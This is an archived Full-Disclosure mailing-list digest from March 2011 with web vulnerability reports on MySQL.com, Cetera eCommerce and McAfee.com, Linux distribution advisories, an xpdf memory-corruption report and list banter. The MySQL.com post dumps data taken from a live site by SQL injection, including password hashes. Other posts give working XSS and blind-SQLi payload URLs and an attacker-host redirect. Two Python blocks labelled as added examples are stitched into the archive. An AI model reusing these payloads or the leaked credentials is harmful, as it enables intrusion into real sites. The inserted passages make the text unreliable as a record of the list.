[Full-disclosure] MySQL.com Vulnerable To Blind SQL Injection Vulnerability

2011-03-27 Thread Jack haxor


---
[+] MySQL.com Vulnerable To Blind SQL Injection vulnerability
[+] Author: Jackh4xor @ w4ck1ng
[+] Site: http://www.jackh4xor.com
---

About MySQL.com :


The Mysql website offers database software, services and support for your 
business, including the Enterprise server, the Network monitoring and advisory 
services and the production support. The wide range of products include: Mysql 
clusters, embedded database, drivers for JDBC, ODBC and Net, visual database 
tools (query browser, migration toolkit) and last but not least the MaxDB- the 
open source database certified for SAP/R3. The Mysql services are also made 
available for you. Choose among the Mysql training for database solutions, 
Mysql certification for the Developers and DBAs, Mysql consulting and support. 
It makes no difference whether you are new to database technology or a skilled 
developer or DBA; Mysql proposes services of all sorts for its customers. 


   

Vulnerable Target  :   http://mysql.com/customers/view/index.html?id=1170
Host IP  :   213.136.52.29
Web Server   :   Apache/2.2.15 (Fedora)
Powered-by   :   PHP/5.2.13
Injection Type:   MySQL Blind
Current DB :   web

Data Bases:

information_schema
bk
certification
c?ashme
cust_sync_interim
customer
dbasavings
downloads
feedback
glassfish_interface
intranet
kaj
license_customers
manual
manual_search
mem
mysql
mysqlforge
mysqlweb
news_events
partner_training
partners
partners_bak
phorum5
planetmysql
qa_contribution
quickpoll
robin
rp
sampo
sampo_interface
sessions
softrax
softrax_interim
solutions
tco
test
track
track_refer
wb
web
web_control
web_projects
web_training
webwiki
wordpress
zack

Current DB: web

Tables

xing_validation
v_web_submissions  
userbk 
user_extra 

user  Columns: cwpid version lead_quality sfid industry address2 created 
last_modified lang notify newsletter gid title fax cell phone country zipcode 
state city address business company position lastname firstname passwd verified 
bounces email user_id

us_zip_state   
us_area_state  
unsub_log  
trials 
trial_external_log 
trial_data 
trial_alias
training_redirect  
tag_blacklist  
tag_applied
tag
support_feeds_DROP 
support_entries_DROP   
states 
snapshots_builds   
snapshots  
sakilapoints   
regions
quote_customer 
quote  
quicklinks 
promo  
product_releases   
position   
partner
paper_lead 
paper_details_options  
paper_details_old  
paper_details  
paper  
newsletter_unsub   
nav_sites  
nav_items  
mysql_history  
mirror_status  
mirror_country 
mirror_continent   
mirror 
mailing_list_member
mailing_list   
locks  
lead_validity_rules
lead_source_xref   
lead_source_external   
lead_source
lead_routing_rule  
lead_rep   
lead_old   
lead_note  
lead_extra_old 
lead_extra_new 
lead_extra 
lead_companies 
lead_campaign_member   
lead   
language_strings   
language_modules   
imagecache 
hall_of_fame   
g_search_term  
g_search_data  
g_blog_data
forum_comment  
forms  
field_xref 
field_options  
field_match
email_blacklist
email_a_friend 
drpl_manual_review 
drpl_denied
drpl_check_log 
drpl_cache 
customer_meta_sets 
customer_meta_set  
customer_meta  
customer   
coupon_product 
coupon_campaign_attribute  
coupon_campaign
coupon 
country
countries  
campaign_type  
campaign_topic 
campaign_score 
campaign_listdata  
campaign_detail
business   
bounces

Database : mysql
Table:

user_info

user Column: Update_pri Insert_priv Select_priv Password User Host

time_zone_transition_type
time_zone_transition
time_zone_name
time_zone_leap_second
time_zone
tables_priv
slow_log
servers
procs_priv
proc
plugin
ndb_binlog_index
inventory
host
help_topic
help_relation
help_keyword
help_category
general_log
func
event
db
columns_priv


# mysql.user Data

Password  User  Host
wembaster %
monitor 10.%
sys %
sys localhost
*06581D0A5474DFF4D5DA3CE0CD7702FA52601412 forumread %
*0702AEBF8E92A002E95D40247776E1A67CD2CA3F wb
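
Read from the defender's side, the mysql.user dump above is an audit list: several accounts have an empty Password column and a '%' host. The following is an added example, not part of the post, that parses a dump in that layout (constructed from the rows above; the host of the truncated 'wb' row is assumed to be '%') and reports password-less accounts, wildcard hosts and pre-4.1 hashes:

```python
# Added example (not from the post above): audit a mysql.user dump for
# password-less accounts, wildcard hosts and pre-4.1 password hashes.
# DUMP is constructed from the table in the post; the host of the 'wb' row
# is truncated there, so '%' is assumed.
import re
from typing import Dict, List, NamedTuple

DUMP = """\
Password  User  Host
wembaster %
monitor 10.%
sys %
sys localhost
*06581D0A5474DFF4D5DA3CE0CD7702FA52601412 forumread %
*0702AEBF8E92A002E95D40247776E1A67CD2CA3F wb %
"""


class UserRow(NamedTuple):
    password: str
    user: str
    host: str


# mysql_native_password hash: '*' followed by 40 upper-case hex digits.
NATIVE_HASH = re.compile(r"^\*[0-9A-F]{40}$")
# Pre-4.1 hash: 16 hex digits, trivially brute-forced and long deprecated.
PRE41_HASH = re.compile(r"^[0-9a-fA-F]{16}$")


def hash_kind(password: str) -> str:
    """Classify the Password column value as MySQL stores it."""
    if password == "":
        return "empty"
    if NATIVE_HASH.match(password):
        return "native"
    if PRE41_HASH.match(password):
        return "pre41"
    return "unknown"


def parse_dump(text: str) -> List[UserRow]:
    """Parse 'Password User Host' lines; a two-field line is a row whose
    Password column is empty (exactly how the dump above prints such rows)."""
    rows = []
    for line in text.strip().splitlines()[1:]:   # skip the header line
        parts = line.split()
        if len(parts) == 2:
            rows.append(UserRow("", parts[0], parts[1]))
        elif len(parts) == 3:
            rows.append(UserRow(parts[0], parts[1], parts[2]))
    return rows


def audit_row(row: UserRow) -> List[str]:
    """Return the findings for one account, in a fixed order."""
    findings = []
    kind = hash_kind(row.password)
    if kind == "empty":
        findings.append("no password")
    elif kind == "pre41":
        findings.append("pre-4.1 weak hash")
    elif kind == "unknown":
        findings.append("unrecognised hash format")
    if row.host == "%":
        findings.append("reachable from any host")
    elif "%" in row.host:
        findings.append("wildcard host pattern")
    if row.user == "":
        findings.append("anonymous account")
    return findings


def audit(rows: List[UserRow]) -> Dict[str, List[str]]:
    """Map 'user'@'host' to its findings; clean accounts are left out."""
    report = {}
    for row in rows:
        findings = audit_row(row)
        if findings:
            report[f"'{row.user}'@'{row.host}'"] = findings
    return report


if __name__ == "__main__":
    for account, findings in audit(parse_dump(DUMP)).items():
        print(f"{account}: {', '.join(findings)}")
```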

[Full-disclosure] [SECURITY] [DSA 2204-1] imp4 security update

2011-03-27 Thread Steffen Joeris

--------------------------------------------------------------------------
Debian Security Advisory DSA-2204-1                   secur...@debian.org
http://www.debian.org/security/                            Steffen Joeris
March 27, 2011                         http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package: imp4
Vulnerability  : Insufficient input sanitising
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2010-3695 
Debian Bug : 598584


Moritz Naumann discovered that imp4, a webmail component for the Horde
framework, is prone to cross-site scripting attacks due to a lack of input
sanitising of certain fetchmail information.


For the oldstable distribution (lenny), this problem has been fixed in
version 4.2-4lenny3.

For the stable distribution (squeeze), this problem has been fixed in
version 4.3.7+debian0-2.1, which was already included in the squeeze
release.

For the testing distribution (wheezy) and the unstable distribution
(sid), this problem has been fixed in version 4.3.7+debian0-2.1.


We recommend that you upgrade your imp4 packages.


Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] XSS, SQL Injection and SQL DB Structure Extraction vulnerabilities in Cetera eCommerce

2011-03-27 Thread MustLive
Hello list!

I want to warn you about Cross-Site Scripting, SQL Injection and SQL DB
Structure Extraction vulnerabilities in Cetera eCommerce. It's an engine for
online shops.

-
Affected products:
-

Vulnerable are Cetera eCommerce 14.0 and previous versions. The XSS holes also
work in Cetera eCommerce 15.0 (which was released in October 2010).

--
Details:
--

XSS (WASC-08) (also work in version 15.0):

http://site/catalog/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

http://site/vendors/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

http://site/catalog/cart/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

http://site/news/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

http://site/news/1301201030/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

XSS (WASC-08):

http://site/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

This vulnerability appeared in version 15.0. The vulnerability is in the
error 404 page, so it works both at this URL and at other URLs which lead
to non-existent pages.

SQL Injection (blind SQLi) (WASC-19):

http://site/catalog/(version()=5.1)/

http://site/catalog/cart/’+benchmark(10,md5(now()))+’/

SQL DB Structure Extraction (WASC-13):

http://site/catalog/%22/

http://site/catalog/cart/’/


Timeline:


2011.01.28 - announced at my site.
2011.01.29 - informed developers.
2011.03.26 - disclosed at my site.

I mentioned these vulnerabilities at my site
(http://websecurity.com.ua/4883/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
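
An added example, not part of the advisory above: a small detector that flags the request shapes MustLive lists (a script tag in a path segment, benchmark()/version() probes, and a lone quote that produces an SQL error page) in Apache combined-log lines. The rule set and the log lines are constructed for the example and are not Cetera's code.

```python
# Added example (not part of the post above): flag the request shapes listed in
# the advisory (script tags in a path, time-based and version() SQLi probes, and
# a lone quote that triggers an SQL error page) in Apache combined-log lines.
# The rule set and the log lines are constructed for the example, not Cetera's.
import re
from typing import Dict, List
from urllib.parse import unquote

# client ident user [time] "METHOD PATH PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Rules run against the percent-decoded, lower-cased request path.
RULES = [
    ("xss_script_tag", re.compile(r"<\s*script\b")),
    ("sqli_time_based", re.compile(r"\b(benchmark|sleep)\s*\(")),
    ("sqli_version_probe", re.compile(r"\bversion\s*\(\s*\)\s*=")),
    # a single or double quote (plain or typographic) inside one path segment
    ("sqli_quote_in_path_segment", re.compile(r"/[^/?]*['\"\u2019][^/?]*(?:/|$)")),
]


def classify(path: str) -> List[str]:
    """Labels matched by one request path, in RULES order."""
    decoded = unquote(path).lower()
    return [label for label, rx in RULES if rx.search(decoded)]


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one hit per suspicious request; a quote probe that produced a 5xx
    is additionally flagged, since that is the error-page leak (WASC-13)."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, ts, _method, path, status = m.groups()
        labels = classify(path)
        if not labels:
            continue
        code = int(status)
        if "sqli_quote_in_path_segment" in labels and code >= 500:
            labels.append("possible_sql_error_disclosure")
        hits.append({"client": client, "time": ts, "path": path,
                     "status": code, "labels": labels})
    return hits


# Constructed log lines: the first four mirror the advisory's URLs, the last
# two are ordinary traffic that must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Mar/2011:10:01:02 +0000] "GET /catalog/%3Cscript%3Ealert(document.cookie)%3C/script%3E/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Mar/2011:10:01:05 +0000] "GET /catalog/(version()=5.1)/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Mar/2011:10:01:09 +0000] "GET /catalog/cart/%27+benchmark(10,md5(now()))+%27/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Mar/2011:10:01:12 +0000] "GET /catalog/%22/ HTTP/1.1" 500 812 "-" "Mozilla/5.0"
198.51.100.4 - - [27/Mar/2011:10:02:00 +0000] "GET /catalog/shoes/ HTTP/1.1" 200 7400 "-" "Mozilla/5.0"
198.51.100.4 - - [27/Mar/2011:10:02:03 +0000] "GET /news/1301201030/ HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["client"], hit["status"], ",".join(hit["labels"]), hit["path"])
```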



[Full-disclosure] TSSA-2011-01 xpdf : multiple vulnerabilities allow remote code execution

2011-03-27 Thread Advisories Toucan-System
-------------------------------------------
* xpdf : multiple vulnerabilities in t1lib *
*  allow arbitrary remote code execution  *
-------------------------------------------




--[ Vulnerability Summary:

Date Published: 28/03/2011
Last Update: 28/03/2011
Advisory ID: TSSA-2011-01
CVE Name: CVE-2011-0764 (previously known as VU#376500)
Title: xpdf : multiple vulnerabilities in t1lib
Remotely Exploitable: Yes
Locally Exploitable: No
Impact: Arbitrary code execution
Advisory URL: http://www.toucan-system.com/advisories/tssa-2011-01.txt


--[ Introduction:

The following 3 paragraphs are taken from the vendor's documentation:

Xpdf is an open source viewer for Portable Document Format (PDF)
files.  (These are also sometimes also called 'Acrobat' files, from
the name of Adobe's PDF software.)  The Xpdf project also includes a
PDF text extractor, PDF-to-PostScript converter, and various other
utilities.

Xpdf runs under the X Window System on UNIX, VMS, and OS/2.  The non-X
components (pdftops, pdftotext, etc.) also run on Win32 systems and
should run on pretty much any system with a decent C++ compiler.

Xpdf is designed to be small and efficient.  It can use Type 1 or
TrueType fonts.


--[ Synopsis:

The Linux version of xpdf is linked against t1lib, which is subject
to multiple vulnerabilities including off-by-ones, integer overflows
and heap corruptions. At least one of those is exploitable and allows
arbitrary code to be executed on the target machine when opening a
specially crafted pdf file.


--[ Vulnerabilities overview:

When parsing specially crafted Type 1 fonts, the t1lib library
is subject to several memory corruption vulnerabilities. We will
exemplify only a few of them: t1lib being decommissioned by xpdf
anyway, they will probably never get fixed.

 [*] Invalid memory reads (off by few):

The following valgrind trace exemplifies an invalid read from
t1lib:

==24009== Invalid read of size 8
==24009==at 0x406364A: ??? (in /usr/lib/libt1.so.5.1.2)
==24009==by 0x4068A0D: ??? (in /usr/lib/libt1.so.5.1.2)
==24009==by 0x4068BEC: ??? (in /usr/lib/libt1.so.5.1.2)
==24009==by 0x4069052: Type1Char (in /usr/lib/libt1.so.5.1.2)
==24009==by 0x40540F3: fontfcnB (in /usr/lib/libt1.so.5.1.2)
==24009==by 0x4077DDC: T1_SetChar (in /usr/lib/libt1.so.5.1.2)
==24009==by 0x407CE88: T1_AASetChar (in /usr/lib/libt1.so.5.1.2)
==24009==by 0x810C95A: ??? (in /usr/bin/xpdf.bin)
==24009==by 0x810BE1E: ??? (in /usr/bin/xpdf.bin)
==24009==by 0x80FA588: ??? (in /usr/bin/xpdf.bin)
==24009==by 0x80C729F: ??? (in /usr/bin/xpdf.bin)
==24009==by 0x8063A91: ??? (in /usr/bin/xpdf.bin)
==24009==by 0x806452E: ??? (in /usr/bin/xpdf.bin)
==24009==by 0x806224C: ??? (in /usr/bin/xpdf.bin)
==24009==by 0x8062589: ??? (in /usr/bin/xpdf.bin)
==24009==by 0x80A690A: ??? (in /usr/bin/xpdf.bin)
==24009==by 0x80AB754: ??? (in /usr/bin/xpdf.bin)
==24009==by 0x80ACF46: ??? (in /usr/bin/xpdf.bin)
==24009==by 0x80E23D6: ??? (in /usr/bin/xpdf.bin)
==24009==by 0x80A7BB0: ??? (in /usr/bin/xpdf.bin)
==24009==by 0x80EE5B9: ??? (in /usr/bin/xpdf.bin)
==24009==by 0x80DEB0F: ??? (in /usr/bin/xpdf.bin)
==24009==by 0x80F1B32: ??? (in /usr/bin/xpdf.bin)
==24009==by 0x458DB55: (below main) (libc-start.c:220)

Note: This given vulnerability cannot execute arbitrary code:
it only allows a remote denial of service of the xpdf reader.

 [*] Invalid memory writes:

In the same fashion, the following trace exemplifies an invalid
memory write, due to a use after free():

==23165== Invalid write of size 2
==23165==at 0x405606C: t1_Bresenham (in /usr/lib/libt1.so.5.1.2)
==23165==by 0x405627E: t1_StepLine (in /usr/lib/libt1.so.5.1.2)
==23165==by 0x405B6E5: t1_Interior (in /usr/lib/libt1.so.5.1.2)
==23165==by 0x405441B: fontfcnB (in /usr/lib/libt1.so.5.1.2)
==23165==by 0x4077DDC: T1_SetChar (in /usr/lib/libt1.so.5.1.2)
==23165==by 0x407CE88: T1_AASetChar (in /usr/lib/libt1.so.5.1.2)
==23165==by 0x810C95A: ??? (in /usr/bin/xpdf.bin)
==23165==by 0x810BE1E: ??? (in /usr/bin/xpdf.bin)
==23165==by 0x80FA588: ??? (in /usr/bin/xpdf.bin)
==23165==by 0x80C729F: ??? (in /usr/bin/xpdf.bin)
==23165==by 0x8063A91: ??? (in /usr/bin/xpdf.bin)
==23165==by 0x806452E: ??? (in /usr/bin/xpdf.bin)
==23165==by 0x806224C: ??? (in /usr/bin/xpdf.bin)
==23165==by 0x8062589: ??? (in /usr/bin/xpdf.bin)
==23165==by 0x80A690A: ??? (in /usr/bin/xpdf.bin)
==23165==by 0x80AB754: ??? (in /usr/bin/xpdf.bin)
==23165==by 0x80ACF46: ??? (in 

[Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-27 Thread YGN Ethical Hacker Group
Vulnerabilities in *McAfee.com


1. VULNERABILITY DESCRIPTION

- Cross Site Scripting
   
http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')

- Information Disclosure & Internal Hostname:
http://www.mcafee.com/js/omniture/omniture_profile.js   

($ ruby host-extract.rb -a
http://www.mcafee.com/js/omniture/omniture_profile.js)

- Information Disclosure & Source Code Disclosure:


view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp

view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp

view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
view-source:http://download.mcafee.com/clinic/Includes/common.asp
view-source:http://download.mcafee.com/updates/upgrade_patches.asp
view-source:http://download.mcafee.com/updates/common/dat_common.asp
view-source:http://download.mcafee.com/updates/updates.asp
view-source:http://download.mcafee.com/updates/superDat.asp 
view-source:http://download.mcafee.com/eval/evaluate2.asp
view-source:http://download.mcafee.com/common/ssi/conditionals.asp
view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
view-source:http://download.mcafee.com/common/ssi/variables.asp

view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
view-source:http://download.mcafee.com/common/ssi/errHandler.asp
view-source:http://download.mcafee.com/common/ssi/common_subs.asp

view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
view-source:http://download.mcafee.com/us/bannerAd.asp

view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp


2. RECOMMENDATION

- Fully utilize Mcafee FoundStone Experts
- Use outbound monitoring of traffic to detect potential information leakage


3. VENDOR

McAfee Inc
http://www.mcafee.com


4. DISCLOSURE TIME-LINE

2011-02-10: reported to vendor
2011-02-12: vendor replied "we are working to resolve the issue as
quickly as possible"
2011-03-27: vulnerability found to be unfixed completely
2011-03-27: vulnerability disclosed


5. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
Former Disclosure, 2008:
http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
Former Disclosure, 2009:
http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
Former Disclosure, 2010:
http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
host-extract: http://code.google.com/p/host-extract/
Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
xssed: http://www.xssed.com/search?key=mcafee.com
Lessons Learned:
http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach

#yehg [2011-03-27]



[Full-disclosure] New Tool - Download Hash Verifier - 56th Tool from SecurityXploded.com

2011-03-27 Thread Nagareshwar Talekar
Hi all,

We have just released a new tool - Download Hash Verifier - 56th tool
from SecurityXploded.com. This is a FREE tool to easily & quickly
verify the integrity of your downloaded file.

For complete details & download visit the DownloadHashVerifier page below,
http://www.securityxploded.com/download-hash-verifier.php


With Regards
Nagareshwar Talekar

http://SecurityXploded.com
http://PasswordForensics.com/
http://NetCertScanner.com
http://twitter.com/securityxploded



Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-27 Thread nix
Am I right? Do they offer Verified by McAfee security services but are
too lazy to fix their own shit? If so, LOL :D




Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-27 Thread nix
 On Sun, Mar 27, 2011 at 7:45 PM,  n...@myproxylists.com wrote:
 Vulnerabilities in *McAfee.com

 Am I right? Do they offer Verified by McAfee security services but are
 too lazy to fix their own shit? If so, LOL :D

 Maybe you should grow up you little twerp.

 Andrew





Are you trying to make love with me? No thanks.



Re: [Full-disclosure] SSL Capable NetCat and more

2011-03-27 Thread Dan Tulovsky
 Besides that, scnc is written in pure-Perl, and is easily modifiable
 by anyone. Such really simple (dumb?) stuff should not be written in
 low-level languages such as C.

You can't be serious...



Re: [Full-disclosure] SSL Capable NetCat and more

2011-03-27 Thread Zach C.
Okay, and also let me rephrase the question: what does your tool do that
*socat* doesn't?

On Sat, Mar 26, 2011 at 1:17 PM, GomoR go...@gomor.org wrote:

 On Sat, Mar 26, 2011 at 08:10:47PM +0200, Anton Ziukin wrote:
  What can your tool do that Ncat (http://nmap.org/ncat/guide/index.html)
  can't?

 Hi,

 interestingly, I published version 1.00 of scnc in April 2008,
 the 27th (and it wasn't the first version to be released):
 http://www.securiteam.com/tools/5RP0O20O0U.html

 And more interestingly, ncat has been integrated in nmap SVN
 in May 2008, the 6th:
 
 r7360 | mixter | 2008-05-06 22:11:22 +0200 (Tue, 06 May 2008) | 1 line

 Initial commit of ncat, as of current sourceforge.net HEAD CVS
 

 Considering this timeline, pardon me if I fix bugs found in my
 software, even when some other tools give the same features.

 Besides that, scnc is written in pure-Perl, and is easily modifiable
 by anyone. Such really simple (dumb?) stuff should not be written in
 low-level languages such as C.

 Regards,

 --
  ^  ___  ___ http://www.GomoR.org/  -+
  | / __ |__/Senior Security Engineer  |
  | \__/ |  \ ---[ zsh$ alias psed='perl -pe ' ]---|
  +--  Net::Frame = http://search.cpan.org/~gomor/  ---+


Re: [Full-disclosure] MySQL.com Vulnerable To Blind SQL Injection Vulnerability

2011-03-27 Thread Cal Leeming
lmao.

Was this accomplished using standard pattern from sqlmap, or did you make
your own?

On Sun, Mar 27, 2011 at 6:46 AM, Jack haxor jackh4...@h4cky0u.org wrote:




Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-27 Thread Cal Leeming
GROUP HUG!

On Sun, Mar 27, 2011 at 9:02 PM, n...@myproxylists.com wrote:


Re: [Full-disclosure] MySQL.com Vulnerable To Blind SQL Injection Vulnerability

2011-03-27 Thread Guilherme Scombatti
pangolin or havij?

lol

On Sun, Mar 27, 2011 at 8:54 AM, Cal Leeming c...@foxwhisper.co.uk wrote:

 lmao.

 Was this accomplished using standard pattern from sqlmap, or did you make
 your own?


[Full-disclosure] [ MDVSA-2011:054 ] java-1.6.0-openjdk

2011-03-27 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2011:054
 http://www.mandriva.com/security/
 ___

 Package : java-1.6.0-openjdk
 Date: March 27, 2011
 Affected: 2009.0, 2010.0, 2010.1, Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities have been identified and fixed in
 java-1.6.0-openjdk:
 
 The JNLP SecurityManager in IcedTea (IcedTea.so) 1.7 before 1.7.7,
 1.8 before 1.8.4, and 1.9 before 1.9.4 for Java OpenJDK returns from
 the checkPermission method instead of throwing an exception in certain
 circumstances, which might allow context-dependent attackers to bypass
 the intended security policy by creating instances of ClassLoader
 (CVE-2010-4351).
 
 Unspecified vulnerability in the Java Runtime Environment (JRE)
 in Oracle Java SE and Java for Business 6 Update 23 and earlier,
 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote
 untrusted Java Web Start applications and untrusted Java applets to
 affect integrity via unknown vectors related to Networking. NOTE: the
 previous information was obtained from the February 2011 CPU. Oracle
 has not commented on claims from a downstream vendor that this issue
 involves DNS cache poisoning by untrusted applets. (CVE-2010-4448)
 
 Unspecified vulnerability in the Java Runtime Environment (JRE)
 in Oracle Java SE and Java for Business 6 Update 23 and earlier for
 Solaris and Linux; 5.0 Update 27 and earlier for Solaris and Linux;
 and 1.4.2_29 and earlier for Solaris and Linux allows local standalone
 applications to affect confidentiality, integrity, and availability via
 unknown vectors related to Launcher. NOTE: the previous information was
 obtained from the February 2011 CPU. Oracle has not commented on claims
 from a downstream vendor that this issue is an untrusted search path
 vulnerability involving an empty LD_LIBRARY_PATH environment variable
 (CVE-2010-4450).
 
 Unspecified vulnerability in the Java Runtime Environment (JRE)
 in Oracle Java SE and Java for Business 6 Update 23 and earlier,
 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote
 untrusted Java Web Start applications and untrusted Java applets to
 affect confidentiality, integrity, and availability via unknown vectors
 related to Swing. NOTE: the previous information was obtained from the
 February 2011 CPU. Oracle has not commented on claims from a downstream
 vendor that this issue is related to the lack of framework support by
 AWT event dispatch, and/or clipboard access in Applets. (CVE-2010-4465)
 
 Unspecified vulnerability in the Java Runtime Environment (JRE)
 in Oracle Java SE and Java for Business 6 Update 23 and earlier,
 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote
 untrusted Java Web Start applications and untrusted Java applets to
 affect confidentiality, integrity, and availability via unknown vectors
 related to HotSpot. NOTE: the previous information was obtained from
 the February 2011 CPU. Oracle has not commented on claims from a
 downstream vendor that this issue is heap corruption related to the
 Verifier and backward jsrs. (CVE-2010-4469)
 
 Unspecified vulnerability in the Java Runtime Environment (JRE) in
 Oracle Java SE and Java for Business 6 Update 23 and earlier
 allows remote attackers to affect availability via unknown vectors
 related to JAXP and unspecified APIs. NOTE: the previous information
 was obtained from the February 2011 CPU. Oracle has not commented on
 claims from a downstream vendor that this issue is related to Features
 set on SchemaFactory not inherited by Validator. (CVE-2010-4470)
 
 Unspecified vulnerability in the Java Runtime Environment (JRE)
 in Oracle Java SE and Java for Business 6 Update 23 and earlier,
 and 5.0 Update 27 and earlier allows remote untrusted Java Web Start
 applications and untrusted Java applets to affect confidentiality
 via unknown vectors related to 2D. NOTE: the previous information
 was obtained from the February 2011 CPU. Oracle has not commented
 on claims from a downstream vendor that this issue is related to the
 exposure of system properties via vectors related to Font.createFont
 and exception text (CVE-2010-4471).
 
 Unspecified vulnerability in the Java Runtime Environment (JRE)
 in Oracle Java SE and Java for Business 6 Update 23 and earlier
 allows remote attackers to affect availability, related to
 XML Digital Signature and unspecified APIs. NOTE: the previous
 information was obtained from the February 2011 CPU. Oracle has
 not commented on claims from a downstream vendor that this issue
 involves the replacement of the XML DSig Transform or C14N algorithm
 implementations. (CVE-2010-4472)
 
 The Double.parseDouble method in Java Runtime 

Re: [Full-disclosure] Materials regarding Cyber-war

2011-03-27 Thread coderman
On Wed, Mar 23, 2011 at 1:33 PM, coderman coder...@gmail.com wrote:
> ...
> iran is pretty incompetent in most information technology respects.
> odds strongly favor pwn hops through their unmonitored, unmaintained,
> unhardened, sloppy conglomerations of servers and switches...*

Iranian hacker using their systems as pwn hop:
  http://pastebin.com/74KXCaEZ
code at:
  http://pastebin.com/DBDqm6Km

Comodo's CEO Melih Abdulhayoglu is an idiot.
Roel Schouwenberg at Kaspersky is an idiot.
Mikko Hypponen at F-Secure is an idiot.
some dude named Austin Heap in SF is an idiot.

all you idiots are punch drunk on cyber.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/